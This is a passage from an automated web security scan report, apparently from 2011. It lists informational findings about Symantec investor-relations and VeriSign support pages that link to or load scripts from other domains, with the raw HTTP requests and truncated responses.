<div class="LithiumLogo lia-component-common-widget-lithium-logo" class="LithiumLogo"> <a class="lia-link-navigation" title="Social CRM & Community Solutions Powered by Lithium" target="_blank" id="lithiumLogoLink" href="http://www.lithium.com/"> <img class="" title="Social CRM & Community Solutions Powered by Lithium" alt="Powered by Lithium" id="display_12" src="http://norton.i.lithium.com/skins/images/36DAF0C87B7C6C4940B22274E6384D9C/base/images/button_lithium_logo.png"/> </a>...[SNIP]... <!-- START OMNITURE JAVASCRIPT INCLUDES --><script src="http://www.symantec.com/script/omniture/om_code.js" language="javascript" type="text/javascript"> </script><script src="http://www.symantec.com/script/omniture/s_code.js" language="javascript" type="text/javascript"> </script>...[SNIP]... </div><script type="text/javascript" src="http://norton.i.lithium.com/t5/scripts/DA34F51B38ECCEA28CC9A83474C0A92F/lia-scripts-common-min.js"> </script><script type="text/javascript" src="http://connect.facebook.net/en_US/all.js"> </script><script type="text/javascript" src="http://norton.i.lithium.com/t5/scripts/77C9F3D724AC1AE6812CFEF77A811FB9/lia-scripts-body-min.js"> </script>...[SNIP]...
14.5. http://investor.symantec.com/phoenix.zhtml
Summary
Severity: Information
Confidence: Certain
Host: http://investor.symantec.com
Path: /phoenix.zhtml
Issue detail
The page was loaded from a URL containing a query string:
http://investor.symantec.com/phoenix.zhtml?c=89422&p=irol-irhomeNews
The response contains the following links to other domains:
http://admin.brightcove.com/js/BrightcoveExperiences.js
http://media.corporate-ir.net/media_files/irol/global_images/icon_calDwnldIT_dis.gif
http://media.corporate-ir.net/media_files/priv/ccbn/powered_edgar_online.gif
http://phx.corporate-ir.net/External.File?item=UGFyZW50SUQ9MTAwMTU4fENoaWxkSUQ9LTF8VHlwZT0z&t=1
http://phx.corporate-ir.net/External.File?item=UGFyZW50SUQ9MTAxMDYyfENoaWxkSUQ9LTF8VHlwZT0z&t=1
http://phx.corporate-ir.net/External.File?item=UGFyZW50SUQ9MTAxNDQ5fENoaWxkSUQ9LTF8VHlwZT0z&t=1
http://phx.corporate-ir.net/External.File?item=UGFyZW50SUQ9NDE0NzIzNnxDaGlsZElEPTQzNDQzN3xUeXBlPTI=&t=1
http://phx.corporate-ir.net/External.File?item=UGFyZW50SUQ9NDE0NzIzNnxDaGlsZElEPTQzNDQzNnxUeXBlPTI=&t=1
http://phx.corporate-ir.net/External.File?item=UGFyZW50SUQ9NDEzNDQ0MXxDaGlsZElEPTQzMTY4OHxUeXBlPTI=&t=1
http://phx.corporate-ir.net/External.File?item=UGFyZW50SUQ9NDEzNDQ0MXxDaGlsZElEPTQzMTYxNHxUeXBlPTI=&t=1
http://phx.corporate-ir.net/External.File?item=UGFyZW50SUQ9NjU1NDF8Q2hpbGRJRD0tMXxUeXBlPTM=&t=1
http://phx.corporate-ir.net/External.File?item=UGFyZW50SUQ9ODE1Njl8Q2hpbGRJRD0tMXxUeXBlPTM=&t=1
http://phx.corporate-ir.net/External.File?item=UGFyZW50SUQ9OTM3ODl8Q2hpbGRJRD0tMXxUeXBlPTM=&t=1
http://phx.corporate-ir.net/External.File?item=UGFyZW50SUQ9OTg4NjB8Q2hpbGRJRD0tMXxUeXBlPTM=&t=1
http://phx.corporate-ir.net/HttpCombiner.ashx?s=RisenJS&v=2
http://widgets.twimg.com/j/2/widget.js
http://www-us.computershare.com/default.asp?bhjs=1&fla=1&cc=CA&lang=en
http://www.corporate-ir.net/media_files/priv/CCBN/event_help/icons/md_pdf.gif
http://www.media-server.com/m/acs/7b9834c9d1bb29b5dd8ae8afb63ff0c5
http://www.veracast.com/webcasts/citigroup/tech2011/22205132.cfm
https://enroll1.icsdelivery.com/symc/Default.aspx
Request
GET /phoenix.zhtml?c=89422&p=irol-irhomeNews HTTP/1.1
Host: investor.symantec.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Cache-Control: private, max-age=58 Date: Fri, 09 Sep 2011 21:42:06 GMT Content-Length: 39751 Connection: close <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><!--###PHBoeHBhZ2U+PHRpbWVTdGFtcD45LzkvMjAxMSA1OjQyOjA2IFBNPC90aW1lU3RhbXA+PHRpbWVUaWxsQ0NCTlJlZnJlc2g+NjA8L3RpbWVUaWxsQ0NCTlJlZnJl...[SNIP]... <link rel="stylesheet" type="text/css" href="client/89/89422/css/ccbnIR.css" /><script src="http://widgets.twimg.com/j/2/widget.js"> </script>...[SNIP]... </script><script src="http://phx.corporate-ir.net/HttpCombiner.ashx?s=RisenJS&v=2" type="text/javascript"> </script>...[SNIP]... </div><script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"> </script>...[SNIP]... <noscript><img src="http://media.corporate-ir.net/media_files/irol/global_images/icon_calDwnldIT_dis.gif" title="Javascript must be enabled to use this feature." border="0" /> </noscript>...[SNIP]... <noscript><img src="http://media.corporate-ir.net/media_files/irol/global_images/icon_calDwnldIT_dis.gif" title="Javascript must be enabled to use this feature." border="0" /> </noscript>...[SNIP]... <td width="100%" valign="middle"><a class="ccbnLnk" href="http://www.veracast.com/webcasts/citigroup/tech2011/22205132.cfm" target="_new" > Click here for webcast</a>...[SNIP]... <td align="center" valign="middle"><img border="0" src="http://www.corporate-ir.net/media_files/priv/CCBN/event_help/icons/md_pdf.gif" alt="Download Event Supporting Material"/>  </td>...[SNIP]... <span class="ccbnTblTxt"><a class="ccbnTblLnk" href="http://phx.corporate-ir.net/External.File?item=UGFyZW50SUQ9NDE0NzIzNnxDaGlsZElEPTQzNDQzNnxUeXBlPTI=&t=1" target="_new"> Q1 FY12 Earnings New Release</a>...[SNIP]... 
<td align="center" valign="middle"><img border="0" src="http://www.corporate-ir.net/media_files/priv/CCBN/event_help/icons/md_pdf.gif" alt="Download Event Supporting Material"/>  </td>...[SNIP]... <span class="ccbnTblTxt"><a class="ccbnTblLnk" href="http://phx.corporate-ir.net/External.File?item=UGFyZW50SUQ9NDE0NzIzNnxDaGlsZElEPTQzNDQzN3xUeXBlPTI=&t=1" target="_new"> Q1 FY12 Supplemental Information</a>...[SNIP]... <td align="center" valign="middle"><img border="0" src="http://www.corporate-ir.net/media_files/priv/CCBN/event_help/icons/md_pdf.gif" alt="Download Event Supporting Material"/>  </td>...[SNIP]... <span class="ccbnTblTxt"><a class="ccbnTblLnk" href="http://phx.corporate-ir.net/External.File?item=UGFyZW50SUQ9MTAxNDQ5fENoaWxkSUQ9LTF8VHlwZT0z&t=1" target="_new"> Q1 2012 Earnings ... Prepared Remarks</a>...[SNIP]... <td align="center" valign="middle"><img border="0" src="http://www.corporate-ir.net/media_files/priv/CCBN/event_help/icons/md_pdf.gif" alt="Download Event Supporting Material"/>  </td>...[SNIP]... <span class="ccbnTblTxt"><a class="ccbnTblLnk" href="http://phx.corporate-ir.net/External.File?item=UGFyZW50SUQ9MTAxMDYyfENoaWxkSUQ9LTF8VHlwZT0z&t=1" target="_new"> Historical Compares for Modified Segment Reporting</a>...[SNIP]... <td align="center" valign="middle"><img border="0" src="http://www.corporate-ir.net/media_files/priv/CCBN/event_help/icons/md_pdf.gif" alt="Download Event Supporting Material"/>  </td>...[SNIP]... <span class="ccbnTblTxt"><a class="ccbnTblLnk" href="http://phx.corporate-ir.net/External.File?item=UGFyZW50SUQ9MTAwMTU4fENoaWxkSUQ9LTF8VHlwZT0z&t=1" target="_new"> Q1 FY12 Foreign Currency Update</a>...[SNIP]... <td align="center" valign="middle"><img border="0" src="http://www.corporate-ir.net/media_files/priv/CCBN/event_help/icons/md_pdf.gif" alt="Download Event Supporting Material"/>  </td>...[SNIP]... 
<span class="ccbnTblTxt"><a class="ccbnTblLnk" href="http://phx.corporate-ir.net/External.File?item=UGFyZW50SUQ9OTM3ODl8Q2hpbGRJRD0tMXxUeXBlPTM=&t=1" target="_new"> Convertible Note Dilution FAQ</a>...[SNIP]... <td width="100%" valign="middle"><a class="ccbnLnk" href="http://www.media-server.com/m/acs/7b9834c9d1bb29b5dd8ae8afb63ff0c5" target="_new" > Click here for webcast</a>...[SNIP]... <td align="center" valign="middle"><img border="0" src="http://www.corporate-ir.net/media_files/priv/CCBN/event_help/icons/md_pdf.gif" alt="Download Event Supporting Material"/>  </td>...[SNIP]... <span class="ccbnTblTxt"><a class="ccbnTblLnk" href="http://phx.corporate-ir.net/External.File?item=UGFyZW50SUQ9NDEzNDQ0MXxDaGlsZElEPTQzMTYxNHxUeXBlPTI=&t=1" target="_new"> Presentation</a>...[SNIP]... <td align="center" valign="middle"><img border="0" src="http://www.corporate-ir.net/media_files/priv/CCBN/event_help/icons/md_pdf.gif" alt="Download Event Supporting Material"/>  </td>...[SNIP]... <span class="ccbnTblTxt"><a class="ccbnTblLnk" href="http://phx.corporate-ir.net/External.File?item=UGFyZW50SUQ9NDEzNDQ0MXxDaGlsZElEPTQzMTY4OHxUeXBlPTI=&t=1" target="_new"> Transcript</a>...[SNIP]... <li><a href="http://phx.corporate-ir.net/External.File?item=UGFyZW50SUQ9NjU1NDF8Q2hpbGRJRD0tMXxUeXBlPTM=&t=1" target="_blank"> Symantec...s Strategy</a>...[SNIP]... <li><a href="http://phx.corporate-ir.net/External.File?item=UGFyZW50SUQ9OTg4NjB8Q2hpbGRJRD0tMXxUeXBlPTM=&t=1" target="_blank"> Corporate Pitch</a>...[SNIP]... <li><a href="http://phx.corporate-ir.net/External.File?item=UGFyZW50SUQ9ODE1Njl8Q2hpbGRJRD0tMXxUeXBlPTM=&t=1" target="_blank"> Corporate Fact Sheet</a>...[SNIP]... <li><a href="http://www-us.computershare.com/default.asp?bhjs=1&fla=1&cc=CA&lang=en" target="_blank"> Shareholder Services (Computershare)</a>...[SNIP]... <li><a href="https://enroll1.icsdelivery.com/symc/Default.aspx" target="_blank"> Request Electronic Delivery</a>...[SNIP]... 
</table><img src="http://media.corporate-ir.net/media_files/priv/ccbn/powered_edgar_online.gif" /> </div>...[SNIP]...
14.6. http://investor.symantec.com/phoenix.zhtml
Summary
Severity: Information
Confidence: Certain
Host: http://investor.symantec.com
Path: /phoenix.zhtml
Issue detail
The page was loaded from a URL containing a query string:
http://investor.symantec.com/phoenix.zhtml?c=89422&p=irol-EventDetails&EventId=3096751
The response contains the following links to other domains:
http://media.corporate-ir.net/media_files/irol/global_images/spacer.gif
http://phx.corporate-ir.net/External.File?item=UGFyZW50SUQ9MzA5Njc1MXxDaGlsZElEPTM4MzM3NnxUeXBlPTI=&t=1
http://phx.corporate-ir.net/External.File?item=UGFyZW50SUQ9MzA5Njc1MXxDaGlsZElEPTM4MzM5NnxUeXBlPTI=&t=1
http://phx.corporate-ir.net/External.File?item=UGFyZW50SUQ9MzA5Njc1MXxDaGlsZElEPTM4MzM5OHxUeXBlPTI=&t=1
http://phx.corporate-ir.net/External.File?item=UGFyZW50SUQ9NDcwMTB8Q2hpbGRJRD0tMXxUeXBlPTM=&t=1
http://phx.corporate-ir.net/External.File?item=UGFyZW50SUQ9NjU1NDF8Q2hpbGRJRD0tMXxUeXBlPTM=&t=1
http://phx.corporate-ir.net/External.File?item=UGFyZW50SUQ9ODE1Njl8Q2hpbGRJRD0tMXxUeXBlPTM=&t=1
http://phx.corporate-ir.net/External.File?item=UGFyZW50SUQ9OTg4NjB8Q2hpbGRJRD0tMXxUeXBlPTM=&t=1
http://phx.corporate-ir.net/HttpCombiner.ashx?s=RisenJS&v=2
http://www-us.computershare.com/default.asp?bhjs=1&fla=1&cc=CA&lang=en
http://www.corporate-ir.net/media_files/priv/CCBN/event_help/icons/md_pdf.gif
http://www.corporate-ir.net/media_files/priv/CCBN/event_help/icons/md_win.gif
http://www.corporate-ir.net/media_files/templates/webcast/tr_pwrby_hrz_rgb_pos.gif
https://enroll1.icsdelivery.com/symc/Default.aspx
Request
GET /phoenix.zhtml?c=89422&p=irol-EventDetails&EventId=3096751 HTTP/1.1
Host: investor.symantec.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 18700 Cache-Control: private, max-age=179 Date: Fri, 09 Sep 2011 21:42:04 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html><!--###PHBoeHBhZ2U+PHRpbWVTdGFtcD45LzkvMjAxMSA1OjQyOjAzIFBNPC90aW1lU3Rh...[SNIP]... </script><script src="http://phx.corporate-ir.net/HttpCombiner.ashx?s=RisenJS&v=2" type="text/javascript"> </script>...[SNIP]... <span class="ccbnTblTxt"><img src="http://media.corporate-ir.net/media_files/irol/global_images/spacer.gif" width="1" height="1" /> <br />...[SNIP]... <td align="left" width="3%"><img border="0" src="http://www.corporate-ir.net/media_files/priv/CCBN/event_help/icons/md_win.gif" alt="Listen to the Webcast in Windows Media Player"/>  </td>...[SNIP]... <span class="ccbnTblTxt"><img src="http://media.corporate-ir.net/media_files/irol/global_images/spacer.gif" width="1" height="1" /> <br />...[SNIP]... <td><img src="http://media.corporate-ir.net/media_files/irol/global_images/spacer.gif" width="1" height="10" /> </td>...[SNIP]... <td align="left" valign="top"><img border="0" src="http://www.corporate-ir.net/media_files/priv/CCBN/event_help/icons/md_pdf.gif" alt="Download Event Supporting Material"/>  </td>...[SNIP]... <span class="ccbnTblTxt"><a href="http://phx.corporate-ir.net/External.File?item=UGFyZW50SUQ9MzA5Njc1MXxDaGlsZElEPTM4MzM5NnxUeXBlPTI=&t=1" target="_new"> Press Release</a>...[SNIP]... <td align="left" valign="top"><img border="0" src="http://www.corporate-ir.net/media_files/priv/CCBN/event_help/icons/md_pdf.gif" alt="Download Event Supporting Material"/>  </td>...[SNIP]... <span class="ccbnTblTxt"><a href="http://phx.corporate-ir.net/External.File?item=UGFyZW50SUQ9MzA5Njc1MXxDaGlsZElEPTM4MzM3NnxUeXBlPTI=&t=1" target="_new"> Presentation</a>...[SNIP]... 
<td align="left" valign="top"><img border="0" src="http://www.corporate-ir.net/media_files/priv/CCBN/event_help/icons/md_pdf.gif" alt="Download Event Supporting Material"/>  </td>...[SNIP]... <span class="ccbnTblTxt"><a href="http://phx.corporate-ir.net/External.File?item=UGFyZW50SUQ9MzA5Njc1MXxDaGlsZElEPTM4MzM5OHxUeXBlPTI=&t=1" target="_new"> FAQ</a>...[SNIP]... <td align="left" valign="top"><img border="0" src="http://www.corporate-ir.net/media_files/priv/CCBN/event_help/icons/md_pdf.gif" alt="Download Event Supporting Material"/>  </td>...[SNIP]... <span class="ccbnTblTxt"><a href="http://phx.corporate-ir.net/External.File?item=UGFyZW50SUQ9NDcwMTB8Q2hpbGRJRD0tMXxUeXBlPTM=&t=1" target="_new"> Symantec to Acquire VeriSign...s Security Business Transcript</a>...[SNIP]... <BR><IMG src="http://www.corporate-ir.net/media_files/templates/webcast/tr_pwrby_hrz_rgb_pos.gif" alt=ThomsonReuters.com border=0 align=center VALIGN=TOP> <BR>...[SNIP]... <li><a href="http://phx.corporate-ir.net/External.File?item=UGFyZW50SUQ9NjU1NDF8Q2hpbGRJRD0tMXxUeXBlPTM=&t=1" target="_blank"> Symantec...s Strategy</a>...[SNIP]... <li><a href="http://phx.corporate-ir.net/External.File?item=UGFyZW50SUQ9OTg4NjB8Q2hpbGRJRD0tMXxUeXBlPTM=&t=1" target="_blank"> Corporate Pitch</a>...[SNIP]... <li><a href="http://phx.corporate-ir.net/External.File?item=UGFyZW50SUQ9ODE1Njl8Q2hpbGRJRD0tMXxUeXBlPTM=&t=1" target="_blank"> Corporate Fact Sheet</a>...[SNIP]... <li><a href="http://www-us.computershare.com/default.asp?bhjs=1&fla=1&cc=CA&lang=en" target="_blank"> Shareholder Services (Computershare)</a>...[SNIP]... <li><a href="https://enroll1.icsdelivery.com/symc/Default.aspx" target="_blank"> Request Electronic Delivery</a>...[SNIP]...
14.7. https://knowledge.verisign.ch/support/code-signing-support/index.html
Summary
Severity: Information
Confidence: Certain
Host: https://knowledge.verisign.ch
Path: /support/code-signing-support/index.html
Issue detail
The page was loaded from a URL containing a query string:
https://knowledge.verisign.ch/support/code-signing-support/index.html?tid=gnpsupport
The response contains the following links to other domains:
https://blogs.verisign.com/?tid=footer
https://cc-admin.geotrust.com/geocenter/reseller/logon.do
https://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_partners-featured-ssl-promo.jpg
https://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_ps-freetrial-promo.jpg
https://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_support-promo.jpg
https://products.verisign.com/geocenter/reseller/logon.do
https://seal.verisign.com/getseal?host_name=knowledge.verisign.ch&size=S&use_flash=YES&use_transparent=YES&lang=en
https://securitycenter.verisign.com/celp/enroll/outsideSearch?application_locale=VRSN_US&originator=VeriSign:CELP
https://ssl-certificate-center.verisign.ch/process/retail/console_login?application_locale=VRSN_CH
https://trust-center.verisign.ch/process/retail/console_login?application_locale=VRSN_CH
https://verisign.com/partnersupport/worldwide/partnersupport.html
https://www.verisign.be/
https://www.verisign.ch/?tid=header-logo
https://www.verisign.co.jp/
https://www.verisign.co.nz/
https://www.verisign.co.uk/
https://www.verisign.co.uk/authentication/consumer-authentication/identity-protection/index.html
https://www.verisign.co.uk/authentication/consumer-authentication/two-factor-authentication/index.html
https://www.verisign.co.uk/authentication/consumer-authentication/two-factor-authentication/index.html?tid=gnps
https://www.verisign.co.uk/authentication/consumer-authentication/vip-fraud-detection-services/index.html?tid=gn-i_need_to
https://www.verisign.co.uk/authentication/enterprise-authentication/managed-pki/index.html
https://www.verisign.co.uk/authentication/enterprise-authentication/pki-infrastructure-solutions/index.html?tid=gnps
https://www.verisign.co.uk/authentication/individual-authentication/digital-id/?tid=gnps
https://www.verisign.com.au/
https://www.verisign.com.br/
https://www.verisign.com.hk/
https://www.verisign.com.sg/
https://www.verisign.com.tw/
https://www.verisign.com/
https://www.verisign.com/ar/
https://www.verisign.com/ca/
https://www.verisign.com/cl/
https://www.verisign.com/latinamerica/esp/
https://www.verisign.com/mx/
https://www.verisign.com/nl/
https://www.verisign.com/partners/ssl-reseller-programs/featured-ssl-partners/index.html?tid=gnpartners-promo
https://www.verisign.com/rss/index.html?tid=footer
https://www.verisign.com/support/code-signing-support/code-signing-misuse/index.html
https://www.verisign.com/verisign-worldwide/index.html?tid=footer
https://www.verisign.de/
https://www.verisign.dk/
https://www.verisign.es/
https://www.verisign.fr/
https://www.verisign.in/
https://www.verisign.it/
https://www.verisign.se/
https://www.verisignchina.com.cn/
Request
GET /support/code-signing-support/index.html?tid=gnpsupport HTTP/1.1
Host: knowledge.verisign.ch
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:43:03 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w...[SNIP]... <p id="site_logo"> <a title="Now from Symantec - VeriSign Authentication Services" href="//www.verisign.ch/?tid=header-logo"> <img src="/apps/infocenter/sites/verisign/images/symc-auth_logo.png">...[SNIP]... <li><a href="//www.verisign.com/ar/"> Argentina</a>...[SNIP]... <li><a href="//www.verisign.com.au/"> Australia</a>...[SNIP]... <li><a href="//www.verisign.be/"> Belgium</a>...[SNIP]... <li><a href="//www.verisign.com.br/"> Brazil</a>...[SNIP]... <li><a href="//www.verisign.com/ca/"> Canada</a>...[SNIP]... <li><a href="//www.verisign.com/cl/"> Chile</a>...[SNIP]... <li><a href="//www.verisignchina.com.cn/"> China</a>...[SNIP]... <li><a href="//www.verisign.dk/"> Denmark</a>...[SNIP]... <li><a href="//www.verisign.fr/"> France</a>...[SNIP]... <li><a href="//www.verisign.de/"> Germany</a>...[SNIP]... <li><a href="//www.verisign.com.hk/"> Hong Kong</a>...[SNIP]... <li><a href="//www.verisign.in/"> India</a>...[SNIP]... <li><a href="//www.verisign.it/"> Italy</a>...[SNIP]... <li><a href="//www.verisign.co.jp/"> Japan</a>...[SNIP]... <li><a href="//www.verisign.com/latinamerica/esp/"> Latin America</a>...[SNIP]... <li><a href="//www.verisign.com/mx/"> Mexico</a>...[SNIP]... <li><a href="//www.verisign.com/nl/"> Netherlands</a>...[SNIP]... <li><a href="//www.verisign.co.nz/"> New Zealand</a>...[SNIP]... <li><a href="//www.verisign.com.sg/"> Singapore</a>...[SNIP]... <li><a href="//www.verisign.es/"> Spain</a>...[SNIP]... <li><a href="//www.verisign.se/"> Sweden</a>...[SNIP]... <li><a href="//www.verisign.com.tw/"> Taiwan</a>...[SNIP]... <li><a href="//www.verisign.com/"> United States</a>...[SNIP]... <li><a href="//www.verisign.co.uk/"> United Kingdom</a>...[SNIP]... 
<div id="header_seal"> <script src="https://seal.verisign.com/getseal?host_name=knowledge.verisign.ch&size=S&use_flash=YES&use_transparent=YES&lang=en" type="text/javascript"> </script>...[SNIP]... <li><a href="//www.verisign.co.uk/authentication/consumer-authentication/two-factor-authentication/index.html?tid=gnps"> Two-Factor Authentication</a>...[SNIP]... <li><a href="//www.verisign.co.uk/authentication/enterprise-authentication/pki-infrastructure-solutions/index.html?tid=gnps"> Public Key Infrastructure (PKI) Services</a>...[SNIP]... <li><a href="//www.verisign.co.uk/authentication/individual-authentication/digital-id/?tid=gnps"> Digital IDs for Secure Email</a>...[SNIP]... <li><a href="//www.verisign.co.uk/authentication/consumer-authentication/vip-fraud-detection-services/index.html?tid=gn-i_need_to"> Detect Fraud Online</a>...[SNIP]... <a class="promo-link" href="http://www.verisign.ch/ssl/free-trial/index.html?tid=gnps-promo"> <img height="183" width="170" alt="Try VeriSign SSL or VeriSign Trust Seal - FREE!" src="https://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_ps-freetrial-promo.jpg"> </a>...[SNIP]... <p class="small"> <a href="//verisign.com/partnersupport/worldwide/partnersupport.html" rel="external"> Email support for login help.</a>...[SNIP]... </div> <a class="promo-link" href="//www.verisign.com/partners/ssl-reseller-programs/featured-ssl-partners/index.html?tid=gnpartners-promo"> <img height="231" width="170" alt="See all Featured SSL Partners" src="https://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_partners-featured-ssl-promo.jpg"> </a>...[SNIP]... <a class="promo-link" href="/support/ssl-certificates-support/index.html?tid=gnpsupport-promo"> <img height="183" width="170" alt="24/7 help with your SSL Certificates. Try the Knowledge Base." src="https://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_support-promo.jpg"> </a>...[SNIP]... 
<li><a href="https://ssl-certificate-center.verisign.ch/process/retail/console_login?application_locale=VRSN_CH"> VeriSign Trust Center Sign In</a>...[SNIP]... <li><a href="https://trust-center.verisign.ch/process/retail/console_login?application_locale=VRSN_CH"> VeriSign Trust Center Sign In</a>...[SNIP]... <li><a href="https://cc-admin.geotrust.com/geocenter/reseller/logon.do"> Code Signing Portal for Microsoft Windows Mobile Sign In</a>...[SNIP]... <li><a href="https://products.verisign.com/geocenter/reseller/logon.do"> VeriSign Partner Center Sign In</a>...[SNIP]... </a> <a style="margin: 5px 10px 0pt 0pt; display: block; font-weight: bold; float: left; background-image: url("/library/VERISIGN/ALL_OTHER/cran_button_75x24.gif"); width: 75px; color: rgb(255, 255, 255); line-height: 24px; height: 24px; text-align: center; text-decoration: none;" href="https://securitycenter.verisign.com/celp/enroll/outsideSearch?application_locale=VRSN_US&originator=VeriSign:CELP"> SEARCH</a>...[SNIP]... <li><a href="https://www.verisign.com/support/code-signing-support/code-signing-misuse/index.html" target="_self"> Report Code Signing Misuse</a>...[SNIP]... <li><a href="//blogs.verisign.com/?tid=footer"> Blogs</a>...[SNIP]... <li><a href="//www.verisign.com/verisign-worldwide/index.html?tid=footer"> Worldwide Sites</a>...[SNIP]... <li> <a href="//www.verisign.com/rss/index.html?tid=footer"> RSS</a>...[SNIP]... </a>, <a href="//www.verisign.co.uk/authentication/consumer-authentication/two-factor-authentication/index.html"> two-factor authentication</a>, <a href="//www.verisign.co.uk/authentication/consumer-authentication/identity-protection/index.html"> identity protection</a>...[SNIP]... </a> and <a href="//www.verisign.co.uk/authentication/enterprise-authentication/pki-infrastructure-solutions/index.html?tid=gnps"> public key infrastructure</a> (<a href="//www.verisign.co.uk/authentication/enterprise-authentication/managed-pki/index.html"> PKI</a>...[SNIP]...
14.8. https://knowledge.verisign.ch/support/digital-id-support/index.html
Summary
Severity: Information
Confidence: Certain
Host: https://knowledge.verisign.ch
Path: /support/digital-id-support/index.html
Issue detail
The page was loaded from a URL containing a query string: https://knowledge.verisign.ch/support/digital-id-support/index.html?tid=gnsupport
The response contains the following links to other domains:
Request
GET /support/digital-id-support/index.html?tid=gnsupport HTTP/1.1
Host: knowledge.verisign.ch
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:43:13 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w...[SNIP]... <p id="site_logo"> <a title="Now from Symantec - VeriSign Authentication Services" href="//www.verisign.ch/?tid=header-logo"> <img src="/apps/infocenter/sites/verisign/images/symc-auth_logo.png">...[SNIP]... <li><a href="//www.verisign.com/ar/"> Argentina</a>...[SNIP]... <li><a href="//www.verisign.com.au/"> Australia</a>...[SNIP]... <li><a href="//www.verisign.be/"> Belgium</a>...[SNIP]... <li><a href="//www.verisign.com.br/"> Brazil</a>...[SNIP]... <li><a href="//www.verisign.com/ca/"> Canada</a>...[SNIP]... <li><a href="//www.verisign.com/cl/"> Chile</a>...[SNIP]... <li><a href="//www.verisignchina.com.cn/"> China</a>...[SNIP]... <li><a href="//www.verisign.dk/"> Denmark</a>...[SNIP]... <li><a href="//www.verisign.fr/"> France</a>...[SNIP]... <li><a href="//www.verisign.de/"> Germany</a>...[SNIP]... <li><a href="//www.verisign.com.hk/"> Hong Kong</a>...[SNIP]... <li><a href="//www.verisign.in/"> India</a>...[SNIP]... <li><a href="//www.verisign.it/"> Italy</a>...[SNIP]... <li><a href="//www.verisign.co.jp/"> Japan</a>...[SNIP]... <li><a href="//www.verisign.com/latinamerica/esp/"> Latin America</a>...[SNIP]... <li><a href="//www.verisign.com/mx/"> Mexico</a>...[SNIP]... <li><a href="//www.verisign.com/nl/"> Netherlands</a>...[SNIP]... <li><a href="//www.verisign.co.nz/"> New Zealand</a>...[SNIP]... <li><a href="//www.verisign.com.sg/"> Singapore</a>...[SNIP]... <li><a href="//www.verisign.es/"> Spain</a>...[SNIP]... <li><a href="//www.verisign.se/"> Sweden</a>...[SNIP]... <li><a href="//www.verisign.com.tw/"> Taiwan</a>...[SNIP]... <li><a href="//www.verisign.com/"> United States</a>...[SNIP]... <li><a href="//www.verisign.co.uk/"> United Kingdom</a>...[SNIP]... 
<div id="header_seal"> <script src="https://seal.verisign.com/getseal?host_name=knowledge.verisign.ch&size=S&use_flash=YES&use_transparent=YES&lang=en" type="text/javascript"> </script>...[SNIP]... <li><a href="//www.verisign.co.uk/authentication/consumer-authentication/two-factor-authentication/index.html?tid=gnps"> Two-Factor Authentication</a>...[SNIP]... <li><a href="//www.verisign.co.uk/authentication/enterprise-authentication/pki-infrastructure-solutions/index.html?tid=gnps"> Public Key Infrastructure (PKI) Services</a>...[SNIP]... <li><a href="//www.verisign.co.uk/authentication/individual-authentication/digital-id/?tid=gnps"> Digital IDs for Secure Email</a>...[SNIP]... <li><a href="//www.verisign.co.uk/authentication/consumer-authentication/vip-fraud-detection-services/index.html?tid=gn-i_need_to"> Detect Fraud Online</a>...[SNIP]... <a class="promo-link" href="http://www.verisign.ch/ssl/free-trial/index.html?tid=gnps-promo"> <img height="183" width="170" alt="Try VeriSign SSL or VeriSign Trust Seal - FREE!" src="https://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_ps-freetrial-promo.jpg"> </a>...[SNIP]... <p class="small"> <a href="//verisign.com/partnersupport/worldwide/partnersupport.html" rel="external"> Email support for login help.</a>...[SNIP]... </div> <a class="promo-link" href="//www.verisign.com/partners/ssl-reseller-programs/featured-ssl-partners/index.html?tid=gnpartners-promo"> <img height="231" width="170" alt="See all Featured SSL Partners" src="https://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_partners-featured-ssl-promo.jpg"> </a>...[SNIP]... <a class="promo-link" href="/support/ssl-certificates-support/index.html?tid=gnpsupport-promo"> <img height="183" width="170" alt="24/7 help with your SSL Certificates. Try the Knowledge Base." src="https://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_support-promo.jpg"> </a>...[SNIP]... 
